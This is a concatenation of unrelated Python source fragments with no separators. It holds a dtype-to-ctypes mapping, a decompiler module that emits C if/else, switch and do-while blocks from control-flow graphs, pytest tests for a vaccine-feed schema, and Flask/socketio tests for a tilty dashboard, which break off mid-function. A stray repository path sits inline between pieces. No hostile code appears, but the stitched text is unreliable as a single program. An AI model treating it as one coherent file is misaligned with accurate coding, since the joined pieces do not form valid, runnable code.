UInt8: pass class UInt16: pass class UInt32: pass class UInt64: pass class Float32: pass class Float64: pass class Bool: pass class Utf8: pass class LargeList: pass class Date32: pass class Date64: pass # Don't change the order of these! 
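# (Presumably the list positions are significant to native-side callers; within
# this module the markers are simply used as lookup keys, e.g.
# DTYPE_TO_FFINAME[Int64] == "i64" and dtype_to_ctype(Float64) is
# ctypes.c_double -- see the mappings below.)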
dtypes = [ Int8, Int16, Int32, Int64, UInt8, UInt16, UInt32, UInt64, Float32, Float64, Bool, Utf8, LargeList, Date32, Date64, ] DTYPE_TO_FFINAME = { Int8: "i8", Int16: "i16", Int32: "i32", Int64: "i64", UInt8: "u8", UInt16: "u16", UInt32: "u32", UInt64: "u64", Float32: "f32", Float64: "f64", Bool: "bool", Utf8: "str", LargeList: "largelist", Date32: "date32", Date64: "date64", } def dtype_to_ctype(dtype: "DataType") -> "ctype": if dtype == UInt8: ptr_type = ctypes.c_uint8 elif dtype == UInt16: ptr_type = ctypes.c_uint16 elif dtype == UInt32: ptr_type = ctypes.c_uint elif dtype == UInt64: ptr_type = ctypes.c_ulong elif dtype == Int8: ptr_type = ctypes.c_int8 elif dtype == Int16: ptr_type = ctypes.c_int16 elif dtype == Int32: ptr_type = ctypes.c_int elif dtype == Int64: ptr_type = ctypes.c_long elif dtype == Float32: ptr_type = ctypes.c_float elif dtype == Float64: ptr_type = ctypes.c_double elif dtype == Date32: ptr_type = ctypes.c_int elif dtype == Date64: ptr_type = ctypes.c_long else: return NotImplemented return ptr_type from collections import defaultdict from dataclasses import dataclass, field, replace from typing import Dict, List, Optional, Set, Tuple, Union from .flow_graph import ( BasicNode, ConditionalNode, FlowGraph, Node, ReturnNode, SwitchNode, TerminalNode, ) from .options import Options from .translate import ( BinaryOp, BlockInfo, CommaConditionExpr, Condition, Expression, Formatter, FunctionInfo, Statement as TrStatement, SwitchControl, format_expr, get_block_info, simplify_condition, ) from .types import Type @dataclass class Context: flow_graph: FlowGraph fmt: Formatter options: Options is_void: bool = True switch_nodes: Dict[SwitchNode, int] = field(default_factory=dict) case_nodes: Dict[Node, List[Tuple[int, str]]] = field( default_factory=lambda: defaultdict(list) ) goto_nodes: Set[Node] = field(default_factory=set) emitted_nodes: Set[Node] = field(default_factory=set) has_warned: bool = False @dataclass class IfElseStatement: condition: Condition if_body: "Body" else_body: Optional["Body"] = None def should_write(self) -> bool: return True def format(self, fmt: Formatter) -> str: space = fmt.indent("") condition = simplify_condition(self.condition) cond_str = format_expr(condition, fmt) after_ifelse = f"\n{space}" if fmt.coding_style.newline_after_if else " " before_else = f"\n{space}" if fmt.coding_style.newline_before_else else " " with fmt.indented(): if_str = "\n".join( [ f"{space}if ({cond_str}){after_ifelse}{{", self.if_body.format(fmt), # has its own indentation f"{space}}}", ] ) if self.else_body is not None and not self.else_body.is_empty(): sub_if = self.else_body.get_lone_if_statement() if sub_if: sub_if_str = sub_if.format(fmt).lstrip() else_str = f"{before_else}else {sub_if_str}" else: with fmt.indented(): else_str = "\n".join( [ f"{before_else}else{after_ifelse}{{", self.else_body.format(fmt), f"{space}}}", ] ) if_str = if_str + else_str return if_str @dataclass class SwitchStatement: jump: SwitchControl body: "Body" # If there are multiple switch statements in a single function, each is given a # unique index starting at 1. This is used in comments to make control flow clear. 
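    # (For example, the second switch in a function gets index 2, and its
    # header and case labels are annotated with a "switch 2" comment by
    # format() here and by LabelStatement below.)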
index: int def should_write(self) -> bool: return True def format(self, fmt: Formatter) -> str: lines = [] comments = [] body_is_empty = self.body.is_empty() if self.index > 0: comments.append(f"switch {self.index}") if not self.jump.jump_table: comments.append("unable to parse jump table") elif body_is_empty: comments.append(f"jump table: {self.jump.jump_table.symbol_name}") suffix = ";" if body_is_empty else " {" lines.append( fmt.with_comments( f"switch ({format_expr(self.jump.control_expr, fmt)}){suffix}", comments ) ) if not body_is_empty: with fmt.indented(): lines.append(self.body.format(fmt)) lines.append(fmt.indent("}")) return "\n".join(lines) @dataclass class SimpleStatement: contents: Optional[Union[str, TrStatement]] comment: Optional[str] = None is_jump: bool = False def should_write(self) -> bool: return self.contents is not None or self.comment is not None def format(self, fmt: Formatter) -> str: if self.contents is None: content = "" elif isinstance(self.contents, str): content = self.contents else: content = self.contents.format(fmt) if self.comment is not None: comments = [self.comment] else: comments = [] return fmt.with_comments(content, comments) def clear(self) -> None: self.contents = None self.comment = None @dataclass class LabelStatement: context: Context node: Node def should_write(self) -> bool: return ( self.node in self.context.goto_nodes or self.node in self.context.case_nodes ) def format(self, fmt: Formatter) -> str: lines = [] if self.node in self.context.case_nodes: for (switch, case_label) in self.context.case_nodes[self.node]: comments = [f"switch {switch}"] if switch != 0 else [] lines.append(fmt.with_comments(f"{case_label}:", comments, indent=-1)) if self.node in self.context.goto_nodes: lines.append(f"{label_for_node(self.context, self.node)}:") return "\n".join(lines) @dataclass class DoWhileLoop: body: "Body" condition: Condition def should_write(self) -> bool: return True def format(self, fmt: Formatter) -> str: space = fmt.indent("") after_do = f"\n{space}" if fmt.coding_style.newline_after_if else " " cond = format_expr(simplify_condition(self.condition), fmt) with fmt.indented(): return "\n".join( [ f"{space}do{after_do}{{", self.body.format(fmt), f"{space}}} while ({cond});", ] ) Statement = Union[ SimpleStatement, IfElseStatement, LabelStatement, SwitchStatement, DoWhileLoop, ] @dataclass class Body: print_node_comment: bool statements: List[Statement] = field(default_factory=list) def extend(self, other: "Body") -> None: """Add the contents of `other` into ourselves""" self.print_node_comment |= other.print_node_comment self.statements.extend(other.statements) def add_node(self, node: Node, comment_empty: bool) -> None: block_info = get_block_info(node) statements = block_info.statements_to_write() # Add node header comment if self.print_node_comment and (statements or comment_empty): self.add_comment(f"Node {node.name()}") # Add node contents for item in statements: self.statements.append(SimpleStatement(item)) def add_statement(self, statement: Statement) -> None: self.statements.append(statement) def add_comment(self, contents: str) -> None: self.add_statement(SimpleStatement(None, comment=contents)) def add_if_else(self, if_else: IfElseStatement) -> None: if if_else.if_body.ends_in_jump(): # Transform `if (A) { B; return C; } else { D; }` # into `if (A) { B; return C; } D;`, # which reduces indentation to make the output more readable self.statements.append(replace(if_else, else_body=None)) if if_else.else_body is not None: 
self.extend(if_else.else_body) return self.statements.append(if_else) def add_do_while_loop(self, do_while_loop: DoWhileLoop) -> None: self.statements.append(do_while_loop) def add_switch(self, switch: SwitchStatement) -> None: self.add_statement(switch) def is_empty(self) -> bool: return not any(statement.should_write() for statement in self.statements) def ends_in_jump(self) -> bool: """ Returns True if the body ends in an unconditional jump (`goto` or `return`), which may allow for some syntax transformations. For example, this is True for bodies ending in a ReturnNode, because `return ...;` statements are marked with is_jump. This function is conservative: it only returns True if we're *sure* if the control flow won't continue past the Body boundary. """ for statement in self.statements[::-1]: if not statement.should_write(): continue return isinstance(statement, SimpleStatement) and statement.is_jump return False def get_lone_if_statement(self) -> Optional[IfElseStatement]: """If the body consists solely of one IfElseStatement, return it, else None.""" ret: Optional[IfElseStatement] = None for statement in self.statements: if statement.should_write(): if not isinstance(statement, IfElseStatement) or ret: return None ret = statement return ret def elide_empty_returns(self) -> None: """Remove `return;` statements from the end of the body. If the final statement is an if-else block, recurse into it.""" for statement in self.statements[::-1]: if ( isinstance(statement, SimpleStatement) and statement.contents == "return;" ): statement.clear() if not statement.should_write(): continue if isinstance(statement, IfElseStatement): statement.if_body.elide_empty_returns() if statement.else_body is not None: statement.else_body.elide_empty_returns() # We could also do this to SwitchStatements, but the generally # preferred style is to keep the final return/break break def format(self, fmt: Formatter) -> str: return "\n".join( statement.format(fmt) for statement in self.statements if statement.should_write() ) def label_for_node(context: Context, node: Node) -> str: if node.loop: return f"loop_{node.block.index}" else: return f"block_{node.block.index}" def emit_node(context: Context, node: Node, body: Body) -> bool: """ Try to emit a node for the first time, together with a label for it. The label is only printed if something jumps to it, e.g. a loop. For return nodes, it's preferred to emit multiple copies, rather than goto'ing a single return statement. For other nodes that were already emitted, instead emit a goto. Since nodes represent positions in assembly, and we use phi's for preserved variable contents, this will end up semantically equivalent. This can happen sometimes when early returns/continues/|| are not detected correctly, and this hints at that situation better than if we just blindly duplicate the block """ if node in context.emitted_nodes: # TODO: Treating ReturnNode as a special case and emitting it repeatedly # hides the fact that we failed to fold the control flow. Maybe remove? if not isinstance(node, ReturnNode): emit_goto(context, node, body) return False else: body.add_comment( f"Duplicate return node #{node.name()}. 
Try simplifying control flow for better match" ) else: body.add_statement(LabelStatement(context, node)) context.emitted_nodes.add(node) body.add_node(node, comment_empty=True) if isinstance(node, ReturnNode): emit_return(context, node, body) return True def emit_goto(context: Context, target: Node, body: Body) -> None: assert not isinstance(target, TerminalNode), "cannot goto a TerminalNode" label = label_for_node(context, target) context.goto_nodes.add(target) body.add_statement(SimpleStatement(f"goto {label};", is_jump=True)) def add_labels_for_switch( context: Context, node: SwitchNode, default_node: Optional[Node] ) -> int: assert node.cases, "jtbl list must not be empty" switch_index = context.switch_nodes[node] # Determine offset offset = 0 switch_control = get_block_info(node).switch_control if isinstance(switch_control, SwitchControl): offset = switch_control.offset # Force hex for case labels if the highest label is above 50, and there are no negative labels use_hex = context.fmt.coding_style.hex_case or ( offset >= 0 and (len(node.cases) + offset) > 50 ) # Mark which labels we need to emit if default_node is not None: # `None` is a sentinel value to mark the `default:` block context.case_nodes[default_node].append((switch_index, "default")) for index, target in enumerate(node.cases): # Do not emit extra `case N:` labels for the `default:` block if target == default_node: continue # Do not emit labels that skip the switch block entirely if target == node.immediate_postdominator: continue case_num = index + offset case_label = f"case 0x{case_num:X}" if use_hex else f"case {case_num}" context.case_nodes[target].append((switch_index, case_label)) return switch_index def is_switch_guard(node: Node) -> bool: """Return True if `node` is a ConditionalNode for checking the bounds of a SwitchNode's control expression. These can usually be combined in the output.""" if not isinstance(node, ConditionalNode): return False cond = get_block_info(node).branch_condition assert cond is not None switch_node = node.fallthrough_edge if not isinstance(switch_node, SwitchNode): return False switch_block_info = get_block_info(switch_node) assert switch_block_info.switch_control is not None # The SwitchNode must have no statements, and the conditional # from the ConditionalNode must properly check the jump table bounds. return ( switch_node.parents == [node] and not switch_block_info.statements_to_write() and switch_block_info.switch_control.matches_guard_condition(cond) ) def gather_any_comma_conditions(block_info: BlockInfo) -> Condition: branch_condition = block_info.branch_condition assert branch_condition is not None comma_statements = block_info.statements_to_write() if comma_statements: assert not isinstance(branch_condition, CommaConditionExpr) return CommaConditionExpr(comma_statements, branch_condition) else: return branch_condition def try_make_if_condition( chained_cond_nodes: List[ConditionalNode], end: Node ) -> Optional[Tuple[Condition, Node, Optional[Node]]]: """ Try to express the nodes in `chained_cond_nodes` as a single `Condition` `cond` to make an if-else statement. `end` is the immediate postdominator of the first node in `chained_cond_nodes`, and is the node following the if-else statement. Returns a tuple of `(cond, if_node, else_node)` representing: ``` if (cond) { goto if_node; } else { goto else_node; } ``` If `else_node` is `None`, then the else block is empty and can be omitted. 
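    As an illustrative example: two chained ConditionalNodes where the second
    is reached only from the first, and where the two share one of their
    target edges, collapse into a single `&&` or `||` of their (possibly
    negated) conditions; a node with an extra incoming edge from outside the
    chain blocks that reduction.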
This function returns `None` if the topology of `chained_cond_nodes` cannot be represented by a single `Condition`. It also returns `None` if `cond` has an outermost && expression with a `CommaConditionExpr`: these are better represented as nested if statements. """ start_node = chained_cond_nodes[0] if_node = chained_cond_nodes[-1].fallthrough_edge else_node: Optional[Node] = chained_cond_nodes[-1].conditional_edge assert else_node is not None # Check that all edges point "forward" to other nodes in the if statement # and translate this DAG of nodes into a dict we can easily modify allowed_nodes = set(chained_cond_nodes) | {if_node, else_node} node_cond_edges: Dict[ConditionalNode, Tuple[Condition, Node, Node]] = {} for node in chained_cond_nodes: if ( node.conditional_edge not in allowed_nodes or node.fallthrough_edge not in allowed_nodes ): # Not a valid set of chained_cond_nodes return None allowed_nodes.remove(node) block_info = get_block_info(node) if node is start_node: # The first condition in an if-statement will have unrelated # statements in its to_write list, which our caller will already # have emitted. Avoid emitting them twice. cond = block_info.branch_condition assert isinstance(cond, Condition) else: # Otherwise, these statements will be added to the condition cond = gather_any_comma_conditions(block_info) node_cond_edges[node] = (cond, node.conditional_edge, node.fallthrough_edge) # Iteratively (try to) reduce the nodes into a single condition # # This is done through a process similar to "Rule T2" used in interval analysis # of control flow graphs, see ref. slides 17-21 of: # http://misailo.web.engr.illinois.edu/courses/526-sp17/lec1.pdf # # We have already ensured that all edges point forward (no loops), and there # are no incoming edges to internal nodes from outside the chain. # # Pick the first pair of nodes which form one of the 4 possible reducible # subgraphs, and then "collapse" them together by combining their conditions # and adjusting their edges. This process is repeated until no more changes # are possible, and is a success if there is exactly 1 condition left. while True: # Calculate the parents for each node in our subgraph node_parents: Dict[ConditionalNode, List[ConditionalNode]] = { node: [] for node in node_cond_edges } for node in node_cond_edges: for child in node_cond_edges[node][1:]: if child not in (if_node, else_node): assert isinstance(child, ConditionalNode) node_parents[child].append(node) # Find the first pair of nodes which form a reducible pair: one will always # be the *only* parent of the other. # Note: we do not include `if_node` or `else_node` in this search for child, parents in node_parents.items(): if len(parents) != 1: continue parent = parents[0] child_cond, child_if, child_else = node_cond_edges[child] parent_cond, parent_if, parent_else = node_cond_edges[parent] # The 4 reducible subgraphs, see ref. 
slides 21-22 of: # https://www2.cs.arizona.edu/~collberg/Teaching/553/2011/Resources/ximing-slides.pdf # In summary: # - The child must have exactly one incoming edge, from the parent # - The parent's other edge must be in common with one of the child's edges # - Replace the condition with a combined condition from the two nodes # - Replace the parent's edges with the child's edges if parent_if is child_if and parent_else is child: parent_else = child_else cond = join_conditions(parent_cond, "||", child_cond) elif parent_if is child_else and parent_else is child: parent_else = child_if cond = join_conditions(parent_cond, "||", child_cond.negated()) elif parent_if is child and parent_else is child_if: parent_if = child_else cond = join_conditions(parent_cond, "&&", child_cond.negated()) elif parent_if is child and parent_else is child_else: parent_if = child_if cond = join_conditions(parent_cond, "&&", child_cond) else: continue # Modify the graph by replacing `parent`'s condition/edges, and deleting `child` node_cond_edges[parent] = (cond, parent_if, parent_else) node_cond_edges.pop(child) break else: # No pair was found, we're done! break # Were we able to collapse all conditions from chained_cond_nodes into one? if len(node_cond_edges) != 1 or start_node not in node_cond_edges: return None cond, left_node, right_node = node_cond_edges[start_node] # Negate the condition if the if/else nodes are backwards if (left_node, right_node) == (else_node, if_node): cond = cond.negated() else: assert (left_node, right_node) == (if_node, else_node) # Check if the if/else needs an else block if else_node is end: else_node = None elif if_node is end: # This is rare, but re-write if/else statements with an empty if body # from `if (cond) {} else { else_node; }` into `if (!cond) { else_node; }` cond = cond.negated() if_node = else_node else_node = None # If there is no `else`, then check the conditions in the outermost `&&` expression. # Complex `&&` conditions are better represented with nested ifs. if else_node is None: c: Expression = cond while isinstance(c, BinaryOp) and c.op == "&&": if isinstance(c.right, CommaConditionExpr): # Fail, to try building a shorter conditional expression return None c = c.left return (cond, if_node, else_node) def build_conditional_subgraph( context: Context, start: ConditionalNode, end: Node ) -> IfElseStatement: """ Output the subgraph between `start` and `end`, including the branch condition in the ConditionalNode `start`. This function detects "plain" if conditions, as well as conditions containing nested && and || terms. As generated by IDO and GCC, conditions with && and || terms are emitted in a very particular way. There will be a "chain" ConditionalNodes, where each node falls through to the next node in the chain. Each conditional edge from the nodes in this chain will go to one of: - The head of the if block body (`if_node`) - The head of the else block body (`else_node`) - A *later* conditional node in the chain (no loops) We know IDO likes to emit the assembly for basic blocks in the same order that they appear in the C source. So, we generally call the fallthrough of the final ConditionNode the `if_node` (unless it is empty). By construction, it will be an earlier node than the `else_node`. """ # Find the longest fallthrough chain of ConditionalNodes. 
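    # (Illustrative example: for source like `if (a && b) { ... }`, IDO/GCC
    # emit two ConditionalNodes, the first falling through to the second and
    # each branching past the if-body when its own term fails; the loop below
    # gathers exactly that kind of fallthrough chain.)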
# This is the starting point for finding the complex &&/|| Condition # The conditional edges will be checked in later step curr_node: Node = start chained_cond_nodes: List[ConditionalNode] = [] while True: assert isinstance(curr_node, ConditionalNode) chained_cond_nodes.append(curr_node) curr_node = curr_node.fallthrough_edge if not ( # If &&/|| detection is disabled, then limit the condition to one node context.options.andor_detection # Only include ConditionalNodes and isinstance(curr_node, ConditionalNode) # Only include nodes that are postdominated by `end` and end in curr_node.postdominators # Exclude the `end` node and end is not curr_node # Exclude any loop nodes (except `start`) and not curr_node.loop # Exclude nodes with incoming edges that are not part of the condition and all(p in chained_cond_nodes for p in curr_node.parents) # Exclude guards for SwitchNodes (they may be elided) and not is_switch_guard(curr_node) ): break # We want to take the largest chain of ConditionalNodes that can be converted to # a single condition with &&'s and ||'s. We start with the largest chain computed # above, and then trim it until it meets this criteria. The resulting chain will # always have at least one node. while True: assert chained_cond_nodes cond_result = try_make_if_condition(chained_cond_nodes, end) if cond_result: break # Shorten the chain by removing the last node, then try again. chained_cond_nodes.pop() cond, if_node, else_node = cond_result # Mark nodes that may have comma expressions in `cond` as emitted context.emitted_nodes.update(chained_cond_nodes[1:]) # Build the if & else bodies else_body: Optional[Body] = None if else_node: else_body = build_flowgraph_between(context, else_node, end) if_body = build_flowgraph_between(context, if_node, end) return IfElseStatement(cond, if_body, else_body) def join_conditions(left: Condition, op: str, right: Condition) -> Condition: assert op in ["&&", "||"] return BinaryOp(left, op, right, type=Type.bool()) def emit_return(context: Context, node: ReturnNode, body: Body) -> None: ret_info = get_block_info(node) ret = ret_info.return_value if ret is not None: ret_str = format_expr(ret, context.fmt) body.add_statement(SimpleStatement(f"return {ret_str};", is_jump=True)) context.is_void = False else: body.add_statement(SimpleStatement("return;", is_jump=True)) def build_switch_between( context: Context, switch: SwitchNode, default: Optional[Node], end: Node, ) -> SwitchStatement: """ Output the subgraph between `switch` and `end`, but not including `end`. The returned SwitchStatement starts with the jump to the switch's value. 
""" switch_cases = switch.cases[:] if default is end: default = None elif default is not None: switch_cases.append(default) switch_index = add_labels_for_switch(context, switch, default) jump = get_block_info(switch).switch_control assert jump is not None switch_body = Body(print_node_comment=context.options.debug) # Order case blocks by their position in the asm, not by their order in the jump table # (but use the order in the jump table to break ties) sorted_cases = sorted( set(switch_cases), key=lambda node: (node.block.index, switch_cases.index(node)) ) next_sorted_cases: List[Optional[Node]] = [] next_sorted_cases.extend(sorted_cases[1:]) next_sorted_cases.append(None) for case, next_case in zip(sorted_cases, next_sorted_cases): if case in context.emitted_nodes or case is end: pass elif ( next_case is not None and next_case not in context.emitted_nodes and next_case is not end and next_case in case.postdominators ): switch_body.extend(build_flowgraph_between(context, case, next_case)) if not switch_body.ends_in_jump(): switch_body.add_comment(f"fallthrough") else: switch_body.extend(build_flowgraph_between(context, case, end)) if not switch_body.ends_in_jump(): switch_body.add_statement(SimpleStatement("break;", is_jump=True)) return SwitchStatement(jump, switch_body, switch_index) def detect_loop(context: Context, start: Node, end: Node) -> Optional[DoWhileLoop]: assert start.loop # Find the the condition for the do-while, if it exists condition: Optional[Condition] = None for node in start.loop.backedges: if ( node in start.postdominators and isinstance(node, ConditionalNode) and node.fallthrough_edge == end ): block_info = get_block_info(node) assert block_info.branch_condition is not None condition = block_info.branch_condition new_end = node break if not condition: return None loop_body = build_flowgraph_between( context, start, new_end, skip_loop_detection=True, ) emit_node(context, new_end, loop_body) return DoWhileLoop(loop_body, condition) def build_flowgraph_between( context: Context, start: Node, end: Node, skip_loop_detection: bool = False ) -> Body: """ Output a section of a flow graph that has already been translated to our symbolic AST. All nodes between start and end, including start but NOT end, will be printed out using if-else statements and block info. `skip_loop_detection` is used to prevent infinite recursion, since (in the case of loops) this function can be recursively called by itself (via `detect_loop`) with the same `start` argument. """ curr_start: Node = start body = Body(print_node_comment=context.options.debug) # We will split this graph into subgraphs, where the entrance and exit nodes # of that subgraph are at the same indentation level. "curr_start" will # iterate through these nodes by taking the immediate postdominators, # which are commonly referred to as articulation nodes. while curr_start != end: assert not isinstance(curr_start, TerminalNode) if ( not skip_loop_detection and curr_start.loop and not curr_start in context.emitted_nodes ): # Find the immediate postdominator to the whole loop, # i.e. the first node outside the loop body imm_pdom: Node = curr_start while imm_pdom in curr_start.loop.nodes: assert imm_pdom.immediate_postdominator is not None imm_pdom = imm_pdom.immediate_postdominator # Construct the do-while loop do_while_loop = detect_loop(context, curr_start, imm_pdom) if do_while_loop: body.add_do_while_loop(do_while_loop) # Move on. 
curr_start = imm_pdom continue # Write the current node, or a goto, to the body if not emit_node(context, curr_start, body): # If the node was already witten, emit_node will use a goto # and return False. After the jump, there control flow will # continue from there (hopefully hitting `end`!) break if curr_start.emit_goto: # If we have decided to emit a goto here, then we should just fall # through to the next node by index, after writing a goto. emit_goto(context, curr_start, body) # Advance to the next node in block order. This may skip over # unreachable blocks -- hopefully none too important. index = context.flow_graph.nodes.index(curr_start) fallthrough = context.flow_graph.nodes[index + 1] if isinstance(curr_start, ConditionalNode): assert fallthrough == curr_start.fallthrough_edge curr_start = fallthrough continue # The interval to process is [curr_start, curr_start.immediate_postdominator) curr_end = curr_start.immediate_postdominator assert curr_end is not None # For nodes with branches, curr_end is not a direct successor of curr_start if is_switch_guard(curr_start): # curr_start is a ConditionalNode that falls through to a SwitchNode, # where the condition checks that the switch's control expression is # within the jump table bounds. # We can combine the if+switch into just a single switch block. assert isinstance(curr_start, ConditionalNode), "checked by is_switch_guard" switch_node = curr_start.fallthrough_edge assert isinstance(switch_node, SwitchNode), "checked by is_switch_guard" default_node = curr_start.conditional_edge # is_switch_guard checked that switch_node has no statements to write, # so it is OK to mark it as emitted context.emitted_nodes.add(switch_node) if curr_end is switch_node: curr_end = switch_node.immediate_postdominator assert curr_end in curr_start.postdominators body.add_switch( build_switch_between(context, switch_node, default_node, curr_end) ) elif isinstance(curr_start, SwitchNode): body.add_switch(build_switch_between(context, curr_start, None, curr_end)) elif isinstance(curr_start, ConditionalNode): body.add_if_else(build_conditional_subgraph(context, curr_start, curr_end)) elif ( isinstance(curr_start, BasicNode) and curr_start.fake_successor == curr_end ): curr_end = curr_start.successor else: # No branch, but double check that we didn't skip any nodes. # If the check fails, then the immediate_postdominator computation was wrong assert curr_start.children() == [curr_end], ( f"While emitting flowgraph between {start.name()}:{end.name()}, " f"skipped nodes while stepping from {curr_start.name()} to {curr_end.name()}." ) # Move on. curr_start = curr_end return body def build_naive(context: Context, nodes: List[Node]) -> Body: """Naive procedure for generating output with only gotos for control flow. 
Used for --no-ifs, when the regular if_statements code fails.""" body = Body(print_node_comment=context.options.debug) def emit_goto_or_early_return(node: Node, body: Body) -> None: if isinstance(node, ReturnNode) and not node.is_real(): emit_node(context, node, body) else: emit_goto(context, node, body) def emit_successor(node: Node, cur_index: int) -> None: if ( cur_index + 1 < len(nodes) and nodes[cur_index + 1] == node and not (isinstance(node, ReturnNode) and not node.is_real()) ): # Fallthrough is fine return emit_goto_or_early_return(node, body) for i, node in enumerate(nodes): if isinstance(node, ReturnNode): # Do not emit duplicated (non-real) return nodes; they don't have # a well-defined position, so we emit them next to where they are # jumped to instead. if node.is_real(): emit_node(context, node, body) elif isinstance(node, BasicNode): emit_node(context, node, body) emit_successor(node.successor, i) elif isinstance(node, SwitchNode): index = add_labels_for_switch(context, node, None) emit_node(context, node, body) jump = get_block_info(node).switch_control assert jump is not None body.add_switch( SwitchStatement( jump=jump, body=Body(print_node_comment=False), index=index, ) ) elif isinstance(node, ConditionalNode): emit_node(context, node, body) if_body = Body(print_node_comment=True) emit_goto_or_early_return(node.conditional_edge, if_body) block_info = get_block_info(node) assert block_info.branch_condition is not None body.add_if_else( IfElseStatement( block_info.branch_condition, if_body=if_body, else_body=None, ) ) emit_successor(node.fallthrough_edge, i) else: assert isinstance(node, TerminalNode) return body def build_body(context: Context, options: Options) -> Body: start_node: Node = context.flow_graph.entry_node() terminal_node: Node = context.flow_graph.terminal_node() is_reducible = context.flow_graph.is_reducible() if options.debug: print("Here's the whole function!\n") # Label switch nodes switch_nodes = [n for n in context.flow_graph.nodes if isinstance(n, SwitchNode)] if len(switch_nodes) == 1: # There is only one switch in this function (no need to label) context.switch_nodes[switch_nodes[0]] = 0 else: for i, switch_node in enumerate(switch_nodes): context.switch_nodes[switch_node] = i + 1 body: Body if options.ifs and is_reducible: body = build_flowgraph_between(context, start_node, terminal_node) body.elide_empty_returns() else: body = Body(print_node_comment=context.options.debug) if options.ifs and not is_reducible: body.add_comment( "Flowgraph is not reducible, falling back to gotos-only mode." 
) body.extend(build_naive(context, context.flow_graph.nodes)) # Check no nodes were skipped: build_flowgraph_between should hit every node in # well-formed (reducible) graphs; and build_naive explicitly emits every node unemitted_nodes = ( set(context.flow_graph.nodes) - context.emitted_nodes - {context.flow_graph.terminal_node()} ) for node in unemitted_nodes: if isinstance(node, ReturnNode) and not node.is_real(): continue body.add_comment( f"bug: did not emit code for node #{node.name()}; contents below:" ) emit_node(context, node, body) return body def get_function_text(function_info: FunctionInfo, options: Options) -> str: fmt = options.formatter() context = Context(flow_graph=function_info.flow_graph, options=options, fmt=fmt) body: Body = build_body(context, options) function_lines: List[str] = [] fn_name = function_info.stack_info.function.name arg_strs = [] for i, arg in enumerate(function_info.stack_info.arguments): if i == 0 and function_info.stack_info.replace_first_arg is not None: original_name, original_type = function_info.stack_info.replace_first_arg arg_strs.append(original_type.to_decl(original_name, fmt)) else: arg_strs.append(arg.type.to_decl(arg.format(fmt), fmt)) if function_info.stack_info.is_variadic: arg_strs.append("...") arg_str = ", ".join(arg_strs) or "void" fn_header = f"{fn_name}({arg_str})" if context.is_void: fn_header = f"void {fn_header}" else: fn_header = function_info.return_type.to_decl(fn_header, fmt) whitespace = "\n" if fmt.coding_style.newline_after_function else " " function_lines.append(f"{fn_header}{whitespace}{{") any_decl = False with fmt.indented(): local_vars = function_info.stack_info.local_vars # GCC's stack is ordered low-to-high (e.g. `int sp10; int sp14;`) # IDO's stack is ordered high-to-low (e.g. `int sp14; int sp10;`) if options.compiler == Options.CompilerEnum.IDO: local_vars = local_vars[::-1] for local_var in local_vars: type_decl = local_var.toplevel_decl(fmt) if type_decl is not None: function_lines.append(SimpleStatement(f"{type_decl};").format(fmt)) any_decl = True # With reused temps (no longer used), we can get duplicate declarations, # hence the use of a set here. 
temp_decls = set() for temp_var in function_info.stack_info.temp_vars: if temp_var.need_decl(): expr = temp_var.expr type_decl = expr.type.to_decl(expr.var.format(fmt), fmt) temp_decls.add(f"{type_decl};") any_decl = True for decl in sorted(temp_decls): function_lines.append(SimpleStatement(decl).format(fmt)) for phi_var in function_info.stack_info.phi_vars: type_decl = phi_var.type.to_decl(phi_var.get_var_name(), fmt) function_lines.append(SimpleStatement(f"{type_decl};").format(fmt)) any_decl = True for reg_var in function_info.stack_info.reg_vars.values(): if reg_var.reg not in function_info.stack_info.used_reg_vars: continue type_decl = reg_var.type.to_decl(reg_var.format(fmt), fmt) function_lines.append(SimpleStatement(f"{type_decl};").format(fmt)) any_decl = True # Create a variable to cast the original first argument to the assumed type if function_info.stack_info.replace_first_arg is not None: assert len(function_info.stack_info.arguments) >= 1 replaced_arg = function_info.stack_info.arguments[0] original_name, original_type = function_info.stack_info.replace_first_arg lhs = replaced_arg.type.to_decl(replaced_arg.format(fmt), fmt) rhs = f"({replaced_arg.type.format(fmt)}) {original_name}" function_lines.append(SimpleStatement(f"{lhs} = {rhs};").format(fmt)) if any_decl: function_lines.append("") function_lines.append(body.format(fmt)) function_lines.append("}") full_function_text: str = "\n".join(function_lines) return full_function_text jeremyschlatter/vaccine-feed-ingest-schema from importlib import reload import pydantic.error_wrappers import pytest from .common import collect_existing_subclasses DEPRECATION_SNIPPET = "vaccine_feed_ingest_schema.schema is deprecated." def test_warn_on_import(): with pytest.warns(DeprecationWarning, match=DEPRECATION_SNIPPET): from vaccine_feed_ingest_schema import schema # Depending on the order in which tests run, the above import may be # skipped. Reload it so that we trigger the warning, if it exists. reload(schema) @pytest.mark.filterwarnings(f"ignore: {DEPRECATION_SNIPPET}") def test_has_expected_classes(): from vaccine_feed_ingest_schema import schema expected = { "Address", "LatLng", "Contact", "OpenDate", "OpenHour", "Availability", "Vaccine", "Access", "Organization", "Link", "Source", "NormalizedLocation", "ImportMatchAction", "ImportSourceLocation", } existing = collect_existing_subclasses(schema, pydantic.BaseModel) missing = expected - existing assert not missing, "Expected pydantic schemas are missing" extra = existing - expected assert not extra, "Extra pydantic schemas found. Update this test." 
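# Illustrative sketch (hypothetical name, not part of the original module):
# collect_existing_subclasses, imported from .common above, is assumed to do
# roughly the following -- walk a module's attributes and return the names of
# classes that subclass the given base.
def _collect_existing_subclasses_sketch(module, base):
    import inspect

    return {
        name
        for name, obj in vars(module).items()
        if inspect.isclass(obj) and issubclass(obj, base) and obj is not base
    }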
@pytest.mark.filterwarnings(f"ignore: {DEPRECATION_SNIPPET}") def test_raises_on_invalid_location(): from vaccine_feed_ingest_schema import schema with pytest.raises(pydantic.error_wrappers.ValidationError): schema.NormalizedLocation() # -*- coding: utf-8 -*- import json import uuid from datetime import datetime from unittest import mock from flask import url_for from pytest_flask.fixtures import client from tilty_dashboard import socketio def test_app(app): """Test to make sure the app is loading properly.""" assert app def test_index(client): """Test that the index works.""" assert client.get(url_for('index')).status_code == 200 def test_device_config( client ): """Test that the device config works.""" with mock.patch("builtins.open", mock.mock_open(read_data=b'data')) as mock_file: assert client.get(url_for('device_config')).status_code == 200 assert mock_file.mock_calls[0] == mock.call('/etc/tilty/tilty.ini', 'r') def test_dashboard_settings(client): """Test that the dashboard settings works.""" assert client.get(url_for('dashboard_settings')).status_code == 200 def test_save_device_config( app, ): with mock.patch("builtins.open", mock.mock_open(read_data=b'data')) as mock_file: test_client = app.test_client() socketio_test_client = socketio.test_client( app, flask_test_client=test_client ) assert socketio_test_client.is_connected() assert test_client.get(url_for('index')).status_code == 200 socketio_test_client.emit( 'save device config', { 'data': { 'config': 'foo', } } ) assert socketio_test_client.get_received() == [] def test_save_settings( app, ): 